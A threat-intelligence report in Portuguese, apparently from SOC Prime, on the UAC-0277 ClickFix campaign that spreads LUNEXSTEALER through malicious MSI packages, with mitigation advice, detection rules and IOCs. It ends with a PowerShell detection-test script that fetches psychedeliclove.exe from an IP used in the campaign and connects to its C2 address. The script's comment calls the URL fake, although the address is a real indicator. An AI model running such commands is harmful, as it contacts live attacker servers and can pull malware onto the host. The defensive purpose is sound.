SOC Prime Bias: High

06 Oct 2026 14:30 UTC

Ataques UAC-0277 Entregam LUNEXSTEALER via MSI Malicioso e ClickFix

Author Photo
SOC Prime Team linkedin icon Seguir
Ataques UAC-0277 Entregam LUNEXSTEALER via MSI Malicioso e ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Os atores de ameaça rastreados como UAC-0277 estão comprometendo sites legítimos para injetar JavaScript malicioso que atrai os usuários a executar comandos por meio de uma página falsa de verificação do Cloudflare. Esta técnica ClickFix, em última análise, entrega pacotes MSI contendo LUNEXSTEALER ou carregadores adicionais que utilizam BYOVD para escapar dos controles de segurança. A campanha também utiliza infraestrutura de comando e controle baseada em blockchain no Polygon e Ethereum para gerenciar dinamicamente recursos dos atacantes.

Investigação

CERT-UA identificou mais de 100 sites comprometidos e analisou três variantes de MSI associadas à campanha. Os pesquisadores observaram o carregamento de DLL secundárias envolvendo FnHotkeyUtility.exe e a exploração do driver vulnerável AMD PDFWKRNL.sys para contornar as proteções do Windows Defender. A investigação também revelou a extensão de navegador LUNARAXE e o componente PowerShell NAIVEMESS utilizados para coletar e exfiltrar dados.

Mitigação

Os administradores devem restringir o acesso à caixa de diálogo Executar (Win+R) por meio da Política de Grupo e limitar os privilégios de instalação MSI a usuários autorizados. Ativar a Lista de Bloqueio de Drivers Vulneráveis da Microsoft é essencial para reduzir o risco de ataques BYOVD. As organizações também devem impor listas de permissão para extensões de navegador e monitorar atividades suspeitas da linha de comando msiexec.exe envolvendo URLs remotas.

Resposta

Quando a execução suspeita de MSI ou extensões de navegador não autorizadas forem detectadas, isole o host afetado e termine os processos associados ao LUNEXSTEALER. Revise as tarefas agendadas para entradas nomeadas psychedelicloveUtils e inspecione perfis de navegador para a extensão Microsoft Office Word Editor. Qualquer página falsa de verificação do Cloudflare associada à campanha deve ser reportada ao CERT-UA.

Fluxo de Ataque

Detecções

Entrada Suspeita no RunMRU Com Semântica LOLBin (via registry_event)

Time SOC Prime
05 Out 2026

Possível Tentativa Remota de Instalação de Arquivo MSI (via cmdline)

Time SOC Prime
05 Out 2026

Tarefa Agendada Suspeita (via audit)

Time SOC Prime
05 Out 2026

Download de Arquivo Direto Via IP Suspeito (via proxy)

Time SOC Prime
05 Out 2026

Comando e Controle Suspeito por Solicitação de DNS com Domínio de Nível Superior (TLD) Incomum (via dns)

Time SOC Prime
05 Out 2026

IOCs (HashSha256) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 2

Regras de IA SOC Prime
06 Out 2026

IOCs (HashSha256) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 1

Regras de IA SOC Prime
06 Out 2026

IOCs (HashMd5) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 2

Regras de IA SOC Prime
06 Out 2026

IOCs (HashMd5) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER Parte 1

Regras de IA SOC Prime
06 Out 2026

IOCs (SourceIP) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER

Regras de IA SOC Prime
06 Out 2026

IOCs (DestinationIP) para detectar: Campanha UAC-0277: Implantação Maliciosa de MSI via Técnica ClickFix e Malware LUNEXSTEALER

Regras de IA SOC Prime
06 Out 2026

Detectar Interação com Servidores C2 Maliciosos Usando HTTP e WebSocket [Conexão de Rede do Windows]

Regras de IA SOC Prime
06 Out 2026

FnHotkeyUtility Executando spkvol.dll Malicioso via Carregamento de DLL [Windows Sysmon]

Regras de IA SOC Prime
06 Out 2026

Download de Pacote MSI Malicioso usando Msiexec e Exploração de Vulnerabilidade [Criação de Processo no Windows]

Regras de IA SOC Prime
06 Out 2026

Detectar JavaScript Malicioso em Sites Comprometidos [Servidor Web]

Regras de IA SOC Prime
06 Out 2026

Execução de Simulação

  • Narrativa do Ataque & Comandos: O adversário realizou com sucesso um comprometimento drive-by. Para estabelecer persistência e baixar o próximo estágio do malware, o agente implantado tenta buscar um arquivo chamado psychedeliclove.exe a partir de um URI específico. Simultaneamente, o agente tenta sinalizar para um nó C2 secundário localizado em 193.178.159.128 na porta 8080 para receber instruções via uma conexão HTTP semelhante ao WebSocket. Estes indicadores específicos são destinados a acionar as regras de detecção baseadas em proxy existentes.

  • Script de Teste de Regressão:

    # Script de Simulação para Validação de Detecção
    # Propósito: Acionar os indicadores específicos de URL e IP/Porta na regra de detecção.
    
    Write-Host "[*] Iniciando Simulação..." -ForegroundColor Cyan
    
    # 1. Selecione o Trigger 1: Padrão de URL Malicioso
    Write-Host "[*] Tentando acessar o padrão de URL malicioso..." -ForegroundColor Yellow
    try {
        # Usamos um listener local inexistente ou um URL falso para garantir que não acessemos de fato um site malicioso real,
        # mas o proxy ainda deve registrar a tentativa de solicitação.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] Solicitação falhou (esperado), mas a telemetria deve ser gerada." -ForegroundColor Gray
    }
    
    # 2. Selecione o Trigger 2: IP e Porta Específicos
    Write-Host "[*] Tentando conectar ao IP C2 na porta 8080..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] Conexão falhou (esperado), mas os logs do proxy devem capturar a tentativa." -ForegroundColor Gray
    }
    
    Write-Host "[*] Simulação Completa." -ForegroundColor Cyan
  • Comandos de Limpeza:

    # Nenhum arquivo persistente é criado por esta simulação.
    # Apenas tentativas de conexões de rede temporárias são feitas.
    Write-Host "[*] Limpeza completa. Nenhum artefato deixado no sistema." -ForegroundColor Green